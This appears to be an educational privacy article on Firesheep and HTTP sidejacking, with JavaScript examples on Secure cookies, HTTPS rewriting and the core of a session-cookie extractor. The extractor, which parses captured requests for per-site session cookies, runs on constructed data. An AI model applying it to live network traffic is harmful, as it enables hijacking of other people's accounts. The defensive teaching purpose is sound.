
Firesheep & User Privacy

Privacy risks are inherent to browsing and interacting online. The recently released tool Firesheep draws attention to how exposed users' web sessions are on shared networks. This article discusses the threat of HTTP session hijacking and some potential methods of reducing it.

HTTP Session Hijacking
Typically, a user logging in to a web site submits a user name and password. The server checks them against the matching account and, once verified, sends back a session cookie that the browser attaches to every subsequent request, so the user does not have to authenticate again. The login step itself is normally protected by encryption (HTTPS); however, the rest of the HTTP session is usually not protected in the same way, so the cookie travels in the clear on every later page.

HTTP session hijacking, also referred to as “sidejacking,” describes an attack in which an attacker captures a user’s session cookie from the network and replays it in his own requests, so the web site treats those requests as the user’s. No password is needed: the cookie is the proof of login. This makes users especially vulnerable on open wireless networks, where anyone in radio range can read unencrypted traffic.

Unfortunately, many web sites do not incorporate adequate protection mechanisms for their users. At this time, the only effective prevention is full end-to-end encryption (HTTPS, that is, HTTP over SSL/TLS) for the entire session, not just the login page. This keeps traffic between the user and the destination private, so the cookie never appears on the wire. A site that does this should also mark its session cookie with the Secure attribute, so that the browser refuses to send it over a plain http:// request even if a stray link or redirect leads to one.
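As an added example (not code from the article or from any of the tools it describes), the following minimal cookie jar mimics how a browser decides which cookies to attach to a request. It shows why a session cookie issued over an HTTPS login but set without the Secure attribute still leaks onto every plain-HTTP page the user visits afterwards, and how the Secure attribute closes that gap. The host name and cookie name are constructed for illustration.

```javascript
// Added example, not from the original page: a simplified browser cookie jar.
// Host name and cookie name are constructed for illustration.

// Parse one Set-Cookie header value into {name, value, domain, secure, httpOnly}.
function parseSetCookie(header, requestHost) {
  const parts = header.split(';').map((p) => p.trim());
  const [name, ...rest] = parts[0].split('=');
  const cookie = {
    name: name.trim(),
    value: rest.join('=').trim(),
    domain: requestHost, // host-only cookie unless a Domain= attribute says otherwise
    secure: false,
    httpOnly: false,
  };
  for (const attr of parts.slice(1)) {
    const [key, val = ''] = attr.split('=');
    switch (key.trim().toLowerCase()) {
      case 'domain':
        cookie.domain = val.trim().replace(/^\./, '').toLowerCase();
        break;
      case 'secure':
        cookie.secure = true;
        break;
      case 'httponly':
        cookie.httpOnly = true;
        break;
      default:
        // Path, Expires, Max-Age and other attributes are ignored in this simplified jar.
    }
  }
  return cookie;
}

// Does a cookie's domain cover this request host? (exact match or subdomain)
function domainMatches(cookieDomain, host) {
  return host === cookieDomain || host.endsWith('.' + cookieDomain);
}

// Return the Cookie header value a browser would send for `url`, given a jar.
// The Secure attribute is the only thing that keeps a cookie off http:// URLs.
function cookiesFor(jar, url) {
  const u = new URL(url);
  const host = u.hostname.toLowerCase();
  return jar
    .filter((c) => domainMatches(c.domain, host))
    .filter((c) => !c.secure || u.protocol === 'https:')
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed login responses from the same site: first setting its session
// cookie without Secure (the situation a sidejacker exploits), then with it.
const weakJar = [parseSetCookie('sid=abc123; Path=/; HttpOnly', 'www.example.com')];
const hardenedJar = [parseSetCookie('sid=abc123; Path=/; Secure; HttpOnly', 'www.example.com')];

// After an HTTPS login, the user clicks through to a plain-HTTP page.
function demo() {
  return {
    weakOverHttp: cookiesFor(weakJar, 'http://www.example.com/home'),          // cookie goes out in the clear
    hardenedOverHttp: cookiesFor(hardenedJar, 'http://www.example.com/home'),  // nothing sent
    hardenedOverHttps: cookiesFor(hardenedJar, 'https://www.example.com/home'), // cookie sent, encrypted
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The Secure attribute is a client-side guarantee: it helps only if the site also serves the pages the user actually visits over HTTPS, since a Secure cookie will simply not be sent to an http:// page and the user will appear logged out there.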

Point-and-Click Sidejacking
Firesheep is a Firefox extension created by Eric Butler, a freelance Web application developer, and released on October 24, 2010. It demonstrates the danger of HTTP session hijacking attacks from public WiFi hotspots. It is free and open source for Mac OS X and Windows, with Linux on the way. Firesheep enables users, technically minded or not, to hijack other people’s sessions on Facebook and a range of other sites.

Facebook, like many other websites, authenticates users with cookies. If a user browses the site through an open, unencrypted WiFi connection, those cookies are sent in the clear with every request and can be captured by anyone on the same network. Firesheep relies on a packet-capture library (WinPcap on Windows, libpcap on Mac OS X) to read that traffic and pick out the authentication cookies for different user accounts, allowing individuals to sidejack the connection.

A user running Firesheep on any open WiFi network is notified as soon as anyone on the network visits an insecure web site. Firesheep then allows the user to log in to that site as the other user with a single click, using the captured cookies. Firesheep’s definition of an “insecure web site” is wide-ranging; it ships with handlers that identify the session cookies of various sites, including:

• Facebook
• Foursquare
• Gowalla
• Amazon.com
• Basecamp
• bit.ly
• Cisco
• CNET
• Dropbox
• Enom
• Evernote
• Flickr
• Github
• Google
• HackerNews
• Harvest
• Windows Live
• NY Times
• Pivotal Tracker
• Slicehost
• tumblr
• Twitter
• WordPress
• Yahoo
• Yelp

For each of the above web sites, it reports the victim’s name, user ID and even their photo, where available. While Firesheep itself runs in Firefox, the victim can be using any operating system or web browser: what matters is only that the session cookie crossed the network unencrypted.
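To make concrete what “identifying cookies” means, here is an added example (not Firesheep’s code) of the core of a sidejacking tool reduced to its essentials: pick plain-text HTTP requests out of captured traffic, read the Host and Cookie headers, and keep a request when it carries every cookie that a per-site “handler” names as the site’s session. Packet capture is replaced by an inline array of constructed payloads, and the site names and cookie names are illustrative, not real handler definitions.

```javascript
// Added example, not from the original page or from Firesheep itself.
// Handlers, hosts and cookie names are constructed for illustration.

// A handler describes one target site, as Firesheep's per-site scripts do.
const HANDLERS = [
  { name: 'ExampleSocial', domains: ['social.example'], sessionCookieNames: ['sid', 'uid'] },
  { name: 'ExampleShop', domains: ['shop.example'], sessionCookieNames: ['session'] },
];

// Parse the head of an HTTP/1.x request from a captured payload. Returns null
// for anything that is not a readable request (TLS records, responses, fragments).
function parseRequest(payload) {
  const text = payload.toString('latin1');
  const headEnd = text.indexOf('\r\n\r\n');
  if (headEnd === -1) return null;
  const lines = text.slice(0, headEnd).split('\r\n');
  const reqLine = /^([A-Z]+) (\S+) HTTP\/1\.[01]$/.exec(lines[0]);
  if (!reqLine) return null;
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i === -1) return null;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method: reqLine[1], path: reqLine[2], headers };
}

// "a=1; b=2" -> { a: '1', b: '2' }
function parseCookieHeader(value) {
  const out = {};
  for (const pair of (value || '').split(';')) {
    const i = pair.indexOf('=');
    if (i > 0) out[pair.slice(0, i).trim()] = pair.slice(i + 1).trim();
  }
  return out;
}

// Find the handler whose domains cover the request's Host header.
function matchHandler(host) {
  const h = host.toLowerCase().replace(/:\d+$/, '');
  return HANDLERS.find((hd) => hd.domains.some((d) => h === d || h.endsWith('.' + d)));
}

// Walk captured payloads; return one entry per hijackable session seen.
function findSessions(payloads) {
  const found = [];
  for (const payload of payloads) {
    const req = parseRequest(payload);
    if (!req || !req.headers.host) continue;
    const handler = matchHandler(req.headers.host);
    if (!handler) continue;
    const cookies = parseCookieHeader(req.headers.cookie);
    // Only a complete set of session cookies lets the attacker replay the login.
    if (!handler.sessionCookieNames.every((n) => n in cookies)) continue;
    const session = {};
    for (const n of handler.sessionCookieNames) session[n] = cookies[n];
    found.push({ site: handler.name, host: req.headers.host, cookies: session });
  }
  return found;
}

// Constructed capture: a logged-in victim browsing the social site over plain
// HTTP (cookies visible), a request with no session yet, a shop session, and a
// TLS record (handshake bytes) that yields nothing because it is encrypted.
const CAPTURE = [
  Buffer.from(
    'GET /home HTTP/1.1\r\nHost: social.example\r\n' +
    'Cookie: sid=9f3c2a; uid=1001; theme=dark\r\n\r\n', 'latin1'),
  Buffer.from('GET /login HTTP/1.1\r\nHost: social.example\r\n\r\n', 'latin1'),
  Buffer.from('GET /cart HTTP/1.1\r\nHost: shop.example\r\nCookie: session=z8\r\n\r\n', 'latin1'),
  Buffer.from([0x16, 0x03, 0x01, 0x00, 0xa5, 0x01, 0x00, 0x00, 0xa1, 0x03, 0x03]),
];

console.log(JSON.stringify(findSessions(CAPTURE), null, 2));
```

Two points the code makes that the prose only states: the attacker needs no credentials, only the cookie names the handler lists, and the TLS payload contributes nothing because there is no readable request line or header inside it. The same parsing logic, pointed at a live capture interface, is the whole attack; that is why a site-wide HTTPS policy, not a clever client, is the fix.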

In Response…
Soon after the release of Firesheep, Facebook made its official response to the exposure of its security shortcomings:
“We have been making progress testing SSL access across Facebook and hope to provide it as an option in the coming months. As always, we advise people to use caution when sending or receiving information over unsecured WiFi networks.”

The Federal Trade Commission (FTC) also recommends that users take the necessary precautions when transmitting sensitive personal information over public networks:
“Be careful about the information you access or send from a public wireless network. To be on the safe side, you may want to assume that other people can access any information you see or send over a public wireless network. Unless you can verify that a hot spot has effective security measures in place, it may be best to avoid sending or receiving sensitive information over that network.”

What is BlackSheep?
Created by Julien Sobrier and released on November 8, 2010, BlackSheep was designed to respond to the Firesheep threat. It is a Firefox plug-in that functions as an early warning system when web sessions are at risk of being sidejacked, or already sidejacked by someone running Firesheep. According to Sobrier:
“If you used BlackSheep and were on WiFi, you could see a warning that someone on the same wireless network was using Firesheep. You would know someone is spying on you and trying to sniff your session, so you shouldn’t go to Facebook… It warns you to be careful.”

BlackSheep is actually based on the Firesheep source code, reusing the same network listening back-end, the list of targeted web sites and the corresponding session cookie names. Instead of capturing sessions, it sends fake session cookies for those sites onto the network and watches for someone else using them, which is what a running Firesheep does when it tries to retrieve the “victim’s” name and photo.

BlackSheep does not block or disable Firesheep, and the level of protection it actually provides is doubtful. Critics point out many shortcomings in BlackSheep’s detection. They also argue that, because Firesheep reports fake cookies as errors when it tries to use them, an educated Firesheep user can tell that someone on the network is running BlackSheep.

HTTPS-Everywhere
Some argue that a far better solution to the Firesheep threat may be the HTTPS-Everywhere tool, which is another Firefox extension. This tool is the product of a collaboration between The Tor Project and the Electronic Frontier Foundation. The HTTPS-Everywhere extension encrypts communications with various major websites, including:
• Google Search
• Facebook
• Twitter
• Wikipedia
• GMX
• WordPress
• NY Times
• PayPal
The HTTPS-Everywhere extension addresses the problem of incomplete encryption, in which a web site supports HTTPS but only uses it on certain pages (typically the login form) and defaults to unencrypted HTTP elsewhere. The tool carries a set of rewrite rules per supported site and rewrites every request to such a site to HTTPS before it leaves the browser. It can only help with sites it has rules for, and only where the site actually serves the page over HTTPS. A further limit is that many web sites display content from third-party domains that are often unavailable over HTTPS; those requests still go out in the clear, and the user is warned about this mixed content.

Force-TLS
Similar to the HTTPS-Everywhere tool, Force-TLS is a Firefox extension that makes the browser convert HTTP to HTTPS for sites the user has indicated. Users list such sites in the Firefox Add-ons Preferences menu. This protects users’ login information and cookies on social networking web sites: by never sending an HTTP request to a listed site, Force-TLS keeps the user’s cookies invisible to Firesheep. As with HTTPS-Everywhere, it requires that the web site can actually be reached over an SSL/TLS-secured channel; the extension cannot encrypt what the site refuses to serve over HTTPS.
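The request rewriting that both HTTPS-Everywhere and Force-TLS perform, as an added example (not either extension’s own code), modelled as a function over a URL. HTTPS-Everywhere’s per-site rulesets are represented as a “from” pattern, a “to” replacement and optional exclusions, as in its rule files; Force-TLS’s user-maintained list is a set of host names. All hosts and rules below are constructed for illustration. A second function lists the subresources of a page that no rule can upgrade, which is the third-party-content gap described above.

```javascript
// Added example, not from HTTPS-Everywhere or Force-TLS. Hosts and rules are constructed.

// Rulesets in the spirit of HTTPS-Everywhere's rule files: from/to are regexes,
// exclusions are URL patterns the rule must leave alone.
const RULESETS = [
  {
    name: 'Example Social',
    rules: [{ from: /^http:\/\/(www\.)?social\.example\//, to: 'https://www.social.example/' }],
    exclusions: [/^http:\/\/www\.social\.example\/legacy\//],
  },
  {
    name: 'Example CDN',
    rules: [{ from: /^http:\/\/cdn\.example\//, to: 'https://cdn.example/' }],
    exclusions: [],
  },
];

// Force-TLS style: hosts the user marked in the add-on preferences.
const FORCED_HOSTS = new Set(['mail.example']);

// Rewrite one URL; returns it unchanged if no rule or forced host applies.
function rewrite(url) {
  if (!url.startsWith('http://')) return url; // already https (or not http at all)
  for (const rs of RULESETS) {
    if (rs.exclusions.some((ex) => ex.test(url))) continue;
    for (const r of rs.rules) {
      if (r.from.test(url)) return url.replace(r.from, r.to);
    }
  }
  const host = new URL(url).hostname.toLowerCase();
  if (FORCED_HOSTS.has(host)) return 'https://' + url.slice('http://'.length);
  return url;
}

// Given a page's subresource URLs, report what still goes out in the clear.
// Anything left on http:// after rewriting is exactly what a sniffer will see.
function unprotected(urls) {
  return urls.map(rewrite).filter((u) => u.startsWith('http://'));
}

// Constructed page: the main site and a CDN have rulesets, the mail host is on
// the forced list, one path is excluded, and a third-party widget has no rule.
const PAGE_URLS = [
  'http://social.example/home',
  'http://cdn.example/app.js',
  'http://mail.example/inbox',
  'http://www.social.example/legacy/old.css',
  'http://widgets.thirdparty.example/badge.js',
];

console.log(PAGE_URLS.map(rewrite));
console.log('still in the clear:', unprotected(PAGE_URLS));
```

The practical reading of `unprotected()` is the caveat from the text: a rewriter protects only the hosts it knows about. The excluded legacy path and the third-party widget both stay on HTTP, and if either request carries a cookie for a site the user is logged in to, that cookie is still exposed.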

Summary
This article explores the threat of HTTP session hijacking, which takes advantage of public WiFi networks to capture web cookies, potentially allowing perpetrators to act as the user, and commit identity theft, without the user’s knowledge. The recently developed Firefox extension Firesheep allows even basic web users to sidejack HTTP sessions. This article also looks at some potential solutions and responses to the Firesheep tool, including BlackSheep, HTTPS-Everywhere and Force-TLS. Such tools draw attention to the reality that, even with security measures in place, sending or receiving sensitive information over public wireless networks can put users at risk of privacy attacks.

CIPP Exam Preparation
In preparation for the Certification Foundation (Foundations) exam; and the Certified Information Privacy Professional/Information Technology (CIPP/IT) exam, a privacy professional should be comfortable with topics related to this post, including:
• Online Privacy – Online Identification Mechanisms – Cookies (Foundations; III.B.g.i.)
• Privacy Concerns – Revealing Private Information to Other Users (CIPP/IT; II.A.i.)
• Privacy-Enhancing Technologies – Web Cookies (CIPP/IT; III.B.c.i.)
• Web Security Protocols – TLS, SSL, HTTPS (CIPP/IT; III.B.c.iv.)
